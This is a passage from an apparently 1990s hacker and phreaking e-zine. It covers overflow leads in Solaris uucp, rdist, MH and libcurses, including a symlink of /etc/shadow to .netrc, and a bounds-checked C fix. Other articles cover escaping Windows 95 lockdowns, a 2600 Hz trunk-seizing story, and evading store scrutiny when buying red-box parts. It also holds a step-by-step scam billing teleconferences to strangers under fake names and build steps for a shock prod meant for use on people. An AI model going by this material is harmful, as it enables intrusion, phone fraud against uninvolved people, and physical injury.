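        return 1;

    num = strtoul(argv[1], NULL, 10);
    for (i = 0; i < num; i++)
    {
        putchar('X');
    }
    return 0;
}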

Compile that as we'll say testit then do on solaris 2.5.1....
uucp `./testit 9999`!`./testit 9999` `./testit 9999`!`./testit 9999` or
whatever the format is......and do the same thing to cu.....I haven't
tried this yet...this is just based on the source.......and like I said
it's possible..the code jumps across many functions and I don't have time
to follow it.......so lemme know the results (shok@sekurity.org, I'm not
going to give my domain at this time... ;))

There was a CERT advisory on rdist vulnerability for Sun, however they
gave enough information to easily find out what the vul was.
Here is the vul:
I'm not going to put all the code for this because it crosses several
functions.....but you pass a macro to argv[1] and it first calls a
makenl() which I guess has something to do with checking if it's a macro
or something but there is no man page for it and it's not in the source so
I don't know what it is.....but then argv[1] is passed on to expand with
this:
in expand expstr(which is the vul function) is called as
expstr(nl->nl_name); and nl->nl_name is argv[1] if it is a macro I'm
assuming. But this is expstr():
expstr(s)
char *s;
char buf[BUFSIZ];
[...]
sprintf(buf, "%s%s%s", s, tp->n_name, tail);

As described in expand.c.......it appears that you can manipulate
environmental variables like SHELL, TERM, etc.....and ~user is also a
macro..you get the idea
shchars = "${[*?".....
E_VARS for expanding variables.......
E_SHELL...
E_TILDE......so if you did rdist $SOMEVAR it will recognize the '$' and
expand that variable.......I haven't been able to test this as the BUFSIZ
is too big and I get disconnected if I export a variable greater than 1000
or so (weird heh...)


This is also related to the message I posted to bugtraq on multiple
overflows in MH-6.8.3.

In ruserpass.c, in the function rnetrc().....they have the following
(which has two vuls):
char *hdir, buf[BUFSIZ];
hdir=getenv("HOME");
[...]
sprintf(buf, "%s/.netrc", hdir);

Now there are two problems with this.....
First of all the obvious....is there is an overflow. Secondly, all one
would have to do is for example ln -s /etc/shadow $HOME/.netrc and you
could abuse that. Libc specifically says you shouldn't do this.

In libcurses, in pr_headers, in print.c there is an overflow in the
char *terminfo;
char buf[512];

terminfo=getenv("TERMINFO")
[...]
sprintf(buf, "%s%s%s", terminfo.....

So anything that uses libcurses (such as screen), is vulnerable. Anyway
it's late, I'm tired.

So that's about all for now.

Enjoy,
--==+*~(Shok)~*+==--

shok@sekurity.org
HOME PAGE: http://www.janova.org FTP SITE: ftp://ftp.janova.org
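
Bounds-checked forms of the copy patterns quoted in the article above
(strcpy() of getenv("TERM") into char term[256], and sprintf() of "%s%s%s" or
"%s/.netrc" into a fixed buffer), as an added example that is neither Sun's
code nor the author's. The function names are made up for the example, and
it covers only the overflow, not the .netrc symlink problem.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copy src into dst[dstsz]. Returns 0 on success, -1 when src is NULL
 * (getenv() returns NULL for an unset variable) or does not fit.
 * On failure dst holds an empty string, never a partial or unterminated
 * one. A bare strncpy() gives neither guarantee: it leaves dst without
 * a '\0' when src fills it, and it truncates silently. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n;

    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    n = strlen(src);
    if (n >= dstsz)              /* no room for the string plus its '\0' */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Bounded form of sprintf(buf, "%s%s%s", a, b, c). snprintf() returns the
 * length the full output needs, so a value >= bufsz means it was cut. */
int join3_bounded(char *buf, size_t bufsz,
                  const char *a, const char *b, const char *c)
{
    int n;

    if (buf == NULL || bufsz == 0)
        return -1;
    buf[0] = '\0';
    if (a == NULL || b == NULL || c == NULL)
        return -1;
    n = snprintf(buf, bufsz, "%s%s%s", a, b, c);
    if (n < 0 || (size_t)n >= bufsz) {
        buf[0] = '\0';           /* reject rather than use a cut-off path */
        return -1;
    }
    return 0;
}

/* Bounded form of sprintf(buf, "%s/.netrc", hdir). */
int build_netrc_path(char *buf, size_t bufsz, const char *home)
{
    return join3_bounded(buf, bufsz, home, "/", ".netrc");
}

int main(void)
{
    char term[256];
    char path[BUFSIZ];

    if (copy_bounded(term, sizeof(term), getenv("TERM")) != 0) {
        fprintf(stderr, "TERM unset or too long, ignoring it\n");
        copy_bounded(term, sizeof(term), "dumb");
    }
    if (build_netrc_path(path, sizeof(path), getenv("HOME")) != 0) {
        fprintf(stderr, "HOME unset or too long, not reading .netrc\n");
        return 1;
    }
    printf("term=%s\nnetrc=%s\n", term, path);
    return 0;
}
```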


ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Operating Systems
by Fucking Hostile

There are a lot of Operating Systems out there. It seems that the two
major ones are Windows and Linux. Among the average computer user you will
find that most of them use Windows 95 or NT. In the computer underground now
it seems the trend is Linux and its variants. Anyways this article will not
be about either of those, actually it will have some info on them but that's
not all. I am writing this with intention to give readers the knowledge of
all available OS's there are out there. Information on the OS, where to find
out more about it, and where to get it. Hopefully people will learn about all
the options they have beyond the trend that is going on out there. This gives
only a little detail on the OS but at least gives you some ideas to look at.


- AROS -

About: The Amiga Replacement OS. Idea started around 1993 when Amiga was at
a low point. AROS fully started in the winter of 1995. The goal of AROS is
to be as compatible as possible to AmigaOS 3.1, ported to different types of
CPU's, Binary compatible on Amiga and source compatible on other hardware,
and can run as a standalone version which boots directly from harddisk, as
an emulation which opens a window on an existing OS to develop software and
run Amiga and native applications at the same time and as a link library
which allows to create native applications with the comfort of the AmigaOS.

Current Version: Unknown

Homepage: http://aros.fh-konstanz.de/aros/

- BeOS -

About: In 1990 former president of Apple's product division,
Jean-Louis Gassée, formed Be. INC. The Be Operating System is a new software
system designed for the media and communications-based applications of the
next decade. While retaining compatibility with data and network standards in
use today, the BeOS jettisons many of the assumptions inherent in older OS
architectures to achieve a new level of performance and a significantly
simplified programming model. The BeOS features: A True Multitasking, Heavily
Multi-threaded System, Symmetric Multiprocessing, An Object-Oriented Design,
A Design for Real-Time Media and Communications, and Simplicity.

Current Version: Unknown

Homepage: http://www.be.com

- CHORUS/OS -

About: The CHORUS/OS family of operating system products has been designed
for telecommunications and other real-time embedded systems manufacturers.
CHORUS/OS offers a binary family of highly configurable, richly featured,
componentized operating system products. When CHORUS operating systems are
integrated with CHORUS/COOL ORB, Chorus' distributed real-time embedded
object request broker, real-time systems and devices have access and are
accessible to any computer, or server in the enterprise, providing management
systems in the enterprise with access to data from the embedded world, and
giving the embedded world access to application software available from
management systems.

Current Version: Unknown

Homepage: http://www.chorus.com

- FreeBSD -

About: FreeBSD is an advanced BSD UNIX operating system for "PC-compatible"
computers, developed and maintained by a large team of individuals. FreeBSD
offers many features today which are still missing in other operating
systems, even some of the best commercial ones. Advanced features for
performance, security, and even binary compatibility with other popular
operating systems. And it's free.

Current Version: 2.2.2

Homepage: http://www.freebsd.org

- NetBSD -

About: The NetBSD Project is the collective volunteer effort of a large group
of people, to produce a freely available and redistributable UNIX-like
operating system, NetBSD. NetBSD is based on a variety of free software,
including 4.4BSD Lite from the University of California, Berkeley. It runs on
a large number of hardware platforms and is highly portable. It comes with
complete source code, and is user-supported.

Current Version: 1.2

Homepage: http://www.netbsd.org

- OpenBSD -

About: The OpenBSD project was spawned from NetBSD (ie. a member of the
4.4BSD family) and is developed separately. OpenBSD tracks bug reports and
source tree changes from the NetBSD and FreeBSD projects fairly closely. Even
pieces of code from the Linux projects have been used. OpenBSD has too much
shit about it to even list so just check out the homepage.

Current Version: 2.1

Homepage: http://www.openbsd.org

- GEOS -

About: Geoworks designed the GEOS® operating system to enable devices that
are graphical, easy-to-use, affordable, feature-rich, and able to support
advanced communications. Geoworks believes there are several primary
characteristics necessary for system software in these new devices. The
operating system must be flexible so that device manufacturers can customize
their products for specific markets. The software must deliver high
performance without sacrificing efficiency. And users of these devices must
be able to connect to standard data sources, including the desktop, corporate
network, and Internet services.

Current Version: Unknown

Homepage: http://www.geoworks.com/htmpages/sso.htm

- Inferno -

About: Inferno was developed by the scientists at Bell Labs, Lucent
Technologies' research and development arm. The Computer Science Research
Center of Bell Labs created Inferno - this same Center developed UNIX, C and
C++ programming languages and workstation technologies. Inferno is a Network
Operating System that delivers interactive services through a variety of
networks, providing ubiquitous access to resources and information.

Current Version: 1.1

Homepage: http://207.121.184.224/info.html

- TurboLinux -

About: TurboLinux 1.0, a new Linux distribution fully compatible with RedHat
Linux, some features include Easy Installation and Setup - Hardware
components (SCSI, Ethernet, and Video adapters) are automatically detected at
installation. TurboDesk - This configurable desktop environment allows
customization without editing text files. AutoUpdate - Packages are
seamlessly installed onto your system using either the interactive mode or
the fully automatic mode.

Current Version: 1.0

Homepage: http://www.turbolinux.com

- Other Linux OS's -

TurboLinux is one of the newer ones so that is why I mentioned it.. there are
a lot more tho that can be found at: http://www.linux.org/dist/index.html

- Microsoft Windows -

Windows 3.1 - Windows 95, Windows 97, Windows CE, and Windows NT

You all know about Windows. If not go to: http://www.microsoft.com

- MINIX -

About: MINIX is a free UNIX clone that is available with all the source code.
Due to its small size, microkernel-based design, and ample documentation, it
is well suited to people who want to run a UNIX-like system on their personal
computer and learn about how such systems work inside. It is quite feasible
for a person unfamiliar with operating system internals to understand nearly
the entire system with a few months of use and study.

Current Version: 2.0

Homepage: http://www.cs.vu.nl/~ast/minix.html

- OS/2 -

About: IBM's OS. Kind of like Windows except they have less software made for
them. If it wasn't for that it might not be too bad.

Current Version: Unknown

Homepage: http://www.software.ibm.com/os/warp/

- Plan9 -

About: Plan 9 is a distributed computing environment assembled from separate
machines acting as terminals, CPU servers, and file servers. A user works at
a terminal, running a window system on a bitmapped display. Some windows are
connected to CPU servers; the intent is that heavy computing should be done
in those windows but it is also possible to compute on the terminal. A
separate file server provides file storage for terminals and CPU servers
alike.

Current Version: Unknown

Homepage: http://www.ecf.toronto.edu/plan9/

- Xinu -

About: Xinu is a small, elegant, multitasking Operating System supporting the
following features: Concurrent Processing, Message Passing, Ports,
Semaphores, Memory Management, Buffer Pools, Uniform Device I/O, Shell, Tcl,
and TCP/IP.

Current Version: Xinu 7.9

Homepage: http://willow.canberra.edu.au/~chrisc/xinu.html

- QNX -

About: Started off being called 'Quick Unix', the QNX realtime OS offers you
all the advantages of a true microkernel. It's small, scalable, extensible,
and fast. As a true microkernel OS, QNX starts with a lean core of highly
reliable code. It's small enough for ROMable embedded applications, yet
powerful enough to run a distributed network of several hundreds of
processors.

Current Version: Unknown

Homepage: http://www.qnx.com

- Solaris -

About: Sun Unix-based user environment, including the Unix operating system
and an X11-based window system. Solaris 1.x is a retroactive (marketing?)
name for SunOS4.1.x, a BSD-like version of Unix with some SVR4 features.
Solaris 2.x (which is what most people mean by "Solaris") includes SunOS5.x,
which is an SVR4-derived Unix.

Current Version: 2.6

Homepage: http://www.sun.com/solaris/index.html

------

Well that is all I have. There are a lot of others out there and a lot more
information on them than I have supplied but hopefully this will give some
people stuff to check out. Also check out http://www.myos.com and
http://www.ugu.com for more info on different OS's.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Hacking your way to DOS
by Devix

Well, I thought I should write an article for thtj this month so here
it is... Newbies Guide: Hacking your way to DOS. Unfortunately your
access to DOS may be restricted so you can't play your games or hack
the LAN. This article will attempt to describe many various ways to
break out of that annoying GUI called windows95 and bring you back to
DOS.

There are many ways to protect you from getting to DOS such as using
policy editor (most common. this can be found on your windows95 cd) or
some other 3rd party software package. Some of these ways may not work
so if one doesn't, just try the next.

1. The old F8 on boot-up. This one is self explanatory. When you see
the "Starting Windows 95..." quickly press the F8 button and it may
bring up a menu that looks like this:

Microsoft Windows 95 Startup Menu
==================================

1. Normal
2. Logged (\BOOTLOG.TXT)
3. Safe mode
4. Safe mode with network support
5. Step-by-step confirmation
6. Command prompt only
7. Safe mode command prompt only
8. Previous version of MS-DOS

Enter a choice: 1

You should choose #6. If everything goes right, you will soon see a
"C:\". If the menu doesn't show up when you press F8, the
administrator (or computer teacher) may have disabled this. To re-
enable it, just fire up notepad and edit "c:\msdos.sys". This file is
normally a system/hidden/readonly file. The part you want to edit is
the line that says "BootMulti=0". Change it to "BootMulti=1".

2. Using OLE. Just start up any program that supports object
embedding such as wordpad and choose "Object..." from the "Insert"
menu. A fancy little box should pop up. Click on "Create from File"
and put this as the file name: "c:\command.com". Click OK and you
should now see an icon stuck in your wordpad document. Double-Click
the icon and a dos prompt should appear.

3. Creating a shortcut in the desktop/start menu. Start any 32-bit
program that lets you open/save files. Click on "Open..." (or "Save
As...") from the "File" menu and change to the directory
"c:\windows\desktop" or "c:\windows\start menu". Right-click in the
main box and choose "New -> Shortcut" from the menu that pops up.
Create a shortcut to "c:\command.com" and then look on the
desktop/start menu for the icon. Use it.

4. Command.com from "File Find". Click once on a blank part of the
taskbar. Press F3. Search for "command.com" from drive "c:". To speed
this up, unselect "Include subfolders". Click "Find" and when
command.com shows up in the results area, double-click it.

5. Editing ".lnk" files. Just edit one of the
"c:\windows\desktop\*.lnk" files with a program that will let you edit
the actual lnk file, not the file it links to. most 16-bit editors
should work. Just change it like you would with a hex-editor so that
it links to "c:\command.com" instead.

6. Changing shells. Just edit "c:\windows\system.ini" so the line that
says "shell=Explorer.exe" will say "shell=c:\command.com". Restart the
computer and you will now have a dos prompt. From dos, type "explorer"
to get the rest of windows loaded. Change system.ini back when you
need everything to work how it was.

7. "Open with...". Start some 32-bit program. Choose "Open..." from
the "File" menu and right-click a file while pressing shift. Choose
"Open with..." and proceed to open the file with "c:\command.com".

8. Word 6+ Macros. Start up Microsoft Word and make a macro that says:

shell "c:\command.com"

Run it.

9. Visual Basic. Startup Vb, make a command button on the form, and
give it the code:

x = Shell("c:\command.com")

Press F5 and then click the button that you just made. Voila!

10. Resetting the screen. Shut down the system so that it shows that
stupid screen "It is now safe to shut off your computer." That screen
is really just a bmp file being displayed over a dos prompt. Type the
following just like you were in dos:

cls
mode co80

This will attempt to reset the screen and show you a "C:\" if it is
applied at the right time.

11. Netscape Apps. Choose "General Preferences" from the Options menu
in netscape and then click on the tab labeled "Apps". Type in:
c:\command.com for your telnet application and then click OK. Next,
surf on over to "telnet://". This should launch a dos prompt.

12. System Information. Start up Microsoft Word and go to "About" from
the help menu. Click the "System Information" button and then the "Run"
button.


Well that's about all I can think of. I know that there are many more
ways to get to dos but I am too busy to find them... Seeya!

Devix - devix@thepentagon.com
www.thepentagon.com/devix
PGP key available above. Use it.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
A phreak's dream come true
Written for thtj from the personal accounts of Kode9

Saturday, September 13, 1997: Kansas City, Missouri

The local Southwestern Bell telephone office gets its basement flooded.

Waking to the sound of a telephone ringing can be a pleasing experience, or
it can be an irritating one; I guess it depends on how much you like phones.
On this particular Saturday, I woke to that very sound, a ringing, but it was
like no ring I'd heard before. It was a bunch of truncated rings, back to
back, like ri..ri..ri.. instead of ring.....ring.....ring. I didn't know what
it was, I didn't pick up the phone either. Thinking it'd go away, I just
waited on it. But it kept making that short ring, over and over again. It
lasted for about ten minutes, and then as quickly as it'd started, it
stopped.

I picked up the phone; no dialtone. It was silent, but it wasn't dead... the
keypad lit up. There must be current, I thought. So the lines were alive, but
there was no dialtone. The switch must've died. Do switches die? This one
wasn't working. Was I the only one? I couldn't call anyone to find out, I'd
have to drive around and see what was going on.

The mall was a lot more interesting than normal today, because apparently the
payphones weren't returning quarters. Don't people listen for a dialtone
before sticking in their money? I've never seen so many people so pissed at a
payphone in my life, it was almost like a riot. I checked for a dialtone on
one of them, though I was fairly certain there wouldn't be one, and I was
right. Dead silence.

How could this fast food eating, instant coffee drinking, all the day's news
in a half hour watching society survive without phone service? Cellular, of
course. The phone of the future, or at least, that's what the cellphone
companies want us to think.

Cell activity today was at an all time high, based on all the calls I picked
up on my scanner. Most of them were people saying "oh gosh, my phone is
dead!" but I did catch DOW chemical ordering some nitroglycerin. Stronger
plastics through the use of explosive compounds? I guess it's possible. I'm
certain that even though 911 has a cellular system, a lot of people died as a
result of the lack of landline service.

Over the course of several hours of waiting for my precious phoneline to
whisper a dialtone softly in my ear, I learned via the local news that the
phone outage was caused by a water main break that flooded the basement of a
Southwestern Bell building, which just so happened to service the exchange I
was in, along with exchanges in half the city. The water had apparently
shorted out the ESS, and down came the system as a result. It's a wonder this
hasn't happened before, SWBell being genius enough to house their ESS in the
basement.

If you haven't wondered already, as to why this story is being called 'a
phreak's dream come true', you're not too bright. For those of you who are
wondering, the title is soon to be explained to you. The phone company, in
its infinite wisdom, decided that rather than continuing to leave the
majority of a large city deaf and mute, they would do the best they could to
bring service back to us. That revelation occurred at around nine in the
evening, a good twelve hours after the trouble began, (so they're a little
slow, we can't blame them, can we?) when I got a call from my girlfriend.

Since the lines were up, I figured now was as good as any time to see exactly
what kind of switching system they'd fired up, just hoping it wasn't ESS. I
quickly dialed up my self appointed 800 testline, 18004GAYASS, and whipped
out my 2600hz tone, proudly stored on my self-built recorder. I played it
into my newly awakened line. Beep. Click. Line available. I didn't send any
KP or ST tones, because I wasn't crazy, and I was well convinced that we
weren't on ESS. Was it xbar? SxS? I don't know, and I was too excited to find
out.

What to do? I did what any noble phreak would do. I called every phreak
I knew of in the Kansas City area. It was a virtual free for all. Anyone
could seize a trunk. Anyone could abuse anything on this ever-so-temporary
switching system that the phone companies were trying to make extinct. It was
like a dream, like a wonderful phone phreaking dream.

The gestapo never stopped by. They probably never knew I'd blown that tone,
because they'd gone back to a system that was apathetic to my nefarious
activities. The playing field had been leveled. The telco vs. the phreaks. It
was amazing. Just thinking about the possibilities made me smile. I could
call London, I could call anywhere; it'd be free. All those far off bbses I'd
never dared to call, for fear of oppressive phonebills... I could call them
with reckless abandon.

Though a joyous event, opportunity didn't last long. It seems like nothing
good ever does. They had ESS back up and running within two hours, but those
precious hours, they were a phreak's dream come true. Later that night while
watching the local news for a followup, things seemed to be well concluded
with the quote of a certain local anchor... "Malicious tampering deterred the
repair crews as they attempted to reinstate phone service in the area. The
tampering was believed to be caused by several youths with some electrical
skill."


If not the thrill of hearing a trunk seized, watching footage of the
switching equipment under four feet of water was the highlight of a memorable
day. To all of you phreaks living in the Kansas City area under the (816)
350, 373, 478, 503, and 795-XXXX exchanges, I hope you thoroughly enjoyed
this once in a lifetime opportunity.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Rat Shak Shopping Made Easy
by N-TREEG

Okay I know some of you guys have had a hard time getting the parts you need
out of your local Rat Shak for whatever your purposes are. This article is
to make your shopping experience a little more pleasurable and / or
successful. Note: "Rat Shak" is henceforth used to avoid all the evil
legalities.

"QUESTIONABLE" PARTS
Okay here's a little tid-bit for you. The employees can't sell you anything
they feel you are going to use for less-than-legal purposes. You'll cut out
a lot of your parts-finding frustration if you don't allude to its uses,
whatever those might be ;-) Just don't bring up the parts' purposes
what-so-ever.

TIP #1: Do not go into Rat Shak with a list if it can be avoided.

If you must have a list here are a few things to keep in mind:
Try to keep it as short as possible. Only have on there a part number or
something if you know specifically what it is you want. The more vague it
is, the less the salesman can conclude from it.

It's also a little less suspicious if your list is hand-written. NEVER EVER
EVER go into Rat Shak with printed box plans in hand. That's getting you
nowhere fast! It's always best if you've memorized the specific part you
need.

TIP #2: Never mention what the parts are going to be used for.

Don't bring it up. If the salesman asks, have some feasible alternative
ready to give that the part could be used for (plan ahead). You can always
say you're replacing the exact same part in a broken toy/gizmo/home project/
appliance, etc. Words to avoid mentioning: red box, descrambler, cable box,
linears, e-prom burners (I doubt they carry 'em), scanner mods, snarfers.


YOUR PURCHASE

TIP #3: Use common sense.

Use your head. Don't ask for two things that are obviously questionable in
the same sale. How much sense does it make to ask for a tone dialer then
turn right around and inquire about crystals. THINK!

TIP #4: The Name and Address bit.

Don't be alarmed when Rat Shak salesmen ask for your infos. They are
supposed to. No, it's not so they can track your purchases, etc. It's only
for their sales flyer. So don't worry about it. Don't give 'em a hard time
and you'll appear a little less suspicious. Plus you can sometimes find
coupons for free stuff in the flyers they send you. Who couldn't use free
batteries every once in a while?

"WE DON'T HAVE ANY"

TIP #5: Make use of the catalog.

So, you can't find what you're looking for on Rat Shak's shelves. No biggie.
Don't automatically assume they just don't want to sell you what it is you
need. Ask to see their yearly catalog. They are usually up on the counter.
Just thumb through them. (Or buy one, great to get parts numbers = no list!)
They've got an index in the back to speed your search. If it's not there
then it more than likely isn't regularly carried in stock. You've got
another option. Ask if you could thumb through their warehouse's catalog.
It's a bookstand that has about 8 or so ring binders beneath it. Flip one of
those open and search there. If you can find what you need in there, have
them order it for you.

OTHER STUFF

TIP #6: Don't try to "card" Rat Shak.

Trying to card Rat Shak is a nice way to get busted. Just don't do it. They
do verify credit cards, same thing for checks. They check signatures and ID
too. Save yourself and them a hassle; pay for your merchandise.

Rat Shak's just a regular store with regular people for employees. They
don't want to give you a hassle. Just exercising common sense will make
your shopping experience more pleasurable for the both of you. They'll be
happy because they'll be making money, you'll be happy because you'll be
getting your part.


Remember if you can't get it at Rat Shak, there are other stores out there:

DigiKey - http://www.digikey.com

Mouser Electronics - http://www.mouser.com

Have fun kids...play nicely.

N-TREEG
HaX0r3d PerceptionS Productions / THTJ
Shouts out to: The THTJ Crew, #phreak, #hackphreak, PADmaster, Speed1,
Shoc, & The Spanish Mafia.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Telephone Conferencing
by DataThief

Well, i've received quite a few questions about setting up conferences
so i went on a search to find an article to suggest to the people that kept
asking me how, but i couldn't find one, so here it is...
Setting up a conference can be a useful and phun skill to have, and
it is a lot easier than it would seem. There are a couple main teleconf.
services including:
AT&T Teleconferencing 800.232.1234
GTE Teleconferencing 800.483.9999
Alliance Teleconferencing varies (in large cities)

i usually use AT&T because they rarely validate u'r info and are extremely
gullible...

ok, here are the steps u take to setup a conf:
1) lookup a name in the phone book, write down the name and #
2) goto u'r fav. fonebooth and dial a conference # listed above
3) give them the info on the paper for the person to be the 'host'
(the person that gets charged for the call)
4) give them the payfone # as u'r number so they can call back
5) tell 'em what time u want it for and how long
6) choose dial-in or dial-out, if dial-in, choose how many ports
(people) to add to the conf.
7) make up some company name in case they ask u for one
8) hang-up and they'll call back in 1-5min
9) they'll either say "sorry charges not accepted" or "ok u'r conf.
will be up when u specified, thank you for using blah..blah..blah"

A typical conversation will go like this:

<operator> Welcome to AT&T Teleconferencing Systems may i help you?
<you> yes, i'd like to setup a conference.
<op> who will be the host?
<you> host?
<op> the person paying the bill for the conference call
<you> oh, <name>
<op> phone # of the host
<you> <phone #>
<op> your name
<you> <fake name>
<op> your phone #?
<you> <payfone #>
<op> duration of the call
<you> 2hours <you can add more if u want>
<op> when will the call begin?
<you> 7:00CST
<op> is this gunna be a dial-in or dial-out conf?
<you> dial-in
<op> how many ports?
<you> 10
<op> okay, we're gunna hang up while i set it up and i'll give u a call in a
few min...okay?
<you> ok

...hang up...
...ring...

<you> hello
<op> hello this is at&t teleconf. is this Mr. <name u gave>
<you> yes
<op> okay your conf will be ready at <whenever>
your dial-in # is 800.xxx.xxxx
your host code is xxxxxx <don't use it unless at a payfone>
your guest code is xxxxxx <u can use this one anywhere>
<you> thanks

Things that can go wrong:
1) u called to set it up from home and the feds show up 2morrow
2) no one gets on within 15 min of the designated start time and it
auto-cancels the conf
3) they don't accept the charges <call right back and start over!>

one last thing about dial-in vs. dial-out
in dial-in, u get the codes, and anyone can dial-into the conf, but u can't
dial out to connect anyone.
in dial-out, only the host can add people, so u have to be at a payfone, but
its fun for pranks and stuff ;)

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
How To Make A Cattleprod
by The Messiah

Contents:
* Introduction
* Ingredients
* How To Get The Ingredients
* First Of All...
* Part 1 - Making The Baton
* Part 2 - Making The Power Pack
* Part 3 - Packaging And Use
* Words Of Wisdom


Introduction:
Have you ever wanted to shock the fuck out of an enemy? Ever wanted to
clear up the congestion in the halls of your local high school? Ever wanted a
hand buzzer similar to the one the Joker had in Batman? Well, this article is
for you. With a wee bit of cash and some ingenuity, you too can be armed with
a ~100-200 milliamperes shock rod.

Ingredients:
* One (1) automobile coil
* One (1) 12v lantern battery *** NOT A CAR BATTERY!!!! ***
* Some red wire
* Some black wire
* A little bit of green wire (not really necessary)
* One push-button switch (non-toggling)
* Two (2) feet of PVC pipe
* One (1) PVC cap
* Wire cutters, hacksaw, wire strippers, electrical tape
* The IQ God gave the average Republican (20)
* A copy of Screeching Weasel's Boogadaboogadaboogda album

How To Get The Ingredients:

You can get the auto coil at a salvage yard. It's a black cylinder with two
electrodes and a big post on the top. The battery, wire, button, tape, wire
cutters, and wire strippers can be found at your local Radio Shack. You can
pick up PVC pipe and cap at your local hardware store. The IQ thing should be
already taken care of. If it's not, you are so fucked. You can get the CD
from Lookout! Records.

First Of All...

This is a pretty big deal. Don't fuck around with this. Test it on a
voltmeter before you try it out on your co-workers. All of your mistakes
will be dealt with by you; I assume no responsibility for anything you do.
Now that that's been said, put on the CD... groove with it...

Part 1 - Making The Baton

Making the actual baton (thing you whack the target with) is a personal
thing. It should be a reflection of your personality. Oh hell... Cut the PVC
pipe to a length of your liking. Now, take two pieces of wire (red and
black), about 3-4 feet long, and strip about 2 inches off the end. Thread
them through the pipe, then pull the stripped ends out the end, like this:

|| || = pipe
* = red wire (ground)
# = black wire (negative)

# *
# *
# *
|| # * ||
|| # * ||
|| # * ||
|| # * ||
|| # * ||

If the wires touch, the circuit shorts out, and does absolutely jack shit. So
make sure they don't. The more contact the baton has with skin, the bigger the
shock. Take the PVC cap and drill two holes in it, spaced evenly:
___
/ \
| * |
| * |
\___/

Thread the ends of the stripped wire through the holes in the caps and screw
the cap on.


Part 2 - Making The Power Pack

This is the heart of the cattle prod. Here's a diagram:

* = red wire (ground)
# = black wire (negative)
$ = green wire (positive)

# * <-- from baton
# *
# *
# * _--_ <--- button
# * $$$$$$$$|____|$$$$$$$$
# _*_ $ $ #######
# | | $ + - #
#####- | | + __|__________|__ #
# _|_| |_|_ | | #
# | | | | #
# | | | | #
# | | | | #
# | | | battery | #
# | | <-- auto coil | | #
# | | |________________| #
# | | #
# |___________| #
# #
####################################################


Part 3 - Packaging And Use

You can put the power pack in a backpack or something, because carrying it is
all funky. To shock someone, touch the two wires at the end of the baton to
their arm or whatever and push the button. Zap.

Words Of Wisdom:

A couple of things- one, *** DO NOT *** use a car battery for the
battery. If you shock someone with a car battery, it will kill the person, or
fuck them up seriously. Please don't kill anyone, k? Also, this kind of setup
tends to drain batteries. A 12v lantern battery will last for about 10-20
shocks.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Securing Linux
by KiDMaGiC

When discussing Linux and networking, one often comes upon a taxing
problem. This problem, to many administrators, can either be a burden
to install or a godsend of smooth sailing. However, if you are in a
situation where the former is true, I will attempt to make this a bit
easier.

Many months ago, back in my earlier days of using Linux, I was gullible
and offered shells off of my slow 28.8 connection, which neither my ISP
nor my machine appreciated. One of the people I (unknowingly) gave a
shell to, unfortunately knew more about slackware 3.0's security than I
did, and had rm -rf / going within seconds. At that point in time, I
realized security was a must for any Linux box connected to the internet.
Your personal LAN or WAN may be different in its breed and creed of users,
but it's much better to be safe than sorry.

The first thing that everyone I asked told me to do, was to install shadow
passwords. This is an incredibly important step which involves using a
random SALT to encrypt your passwords. This generally is much harder to
break, and can save you a break-in due to unprotected crypt passwords.
Even though shadow passwords can be slightly difficult to install for a new
Linux user, the benefits outweigh the trials.

Another good idea is to install a tcp wrapper. These can be found on
sunsite (ftp://sunsite.unc.edu/pub/Linux/) and are generally just good
ideas. These can be your alternative to firewalls, but have fewer
functions. Basically, a tcp wrapper checks the address of an incoming tcp
packet (such as a packet for telnet, ftp, finger, etc.) and compares it to
a group of files. These files contain a list of addresses, what services
they can use, and whether or not the address should be allowed or denied.
I find this my primary defense in the brutal world of "drive-by" attacks.

If you happen to be a security/encryption nut like myself, you may also
wish to get such utilities as pgp and ssh. PGP is the acronym for Pretty
Good Privacy, which is "encryption for the masses." This little program
is very efficient in encoding anything you want to keep secure, from
emails to book reports to sensitive source code. This is an invaluable
tool to have, and also just fun to play with with your friends. SSH, or
secure shell, is similar to rsh, but offers advanced encryption options to
avoid your connection being monitored by an outside third party. This is
another invaluable tool if you have reason to believe people are out to
foil your plans of world domination. :)

These are just a small few of the many options you can explore for
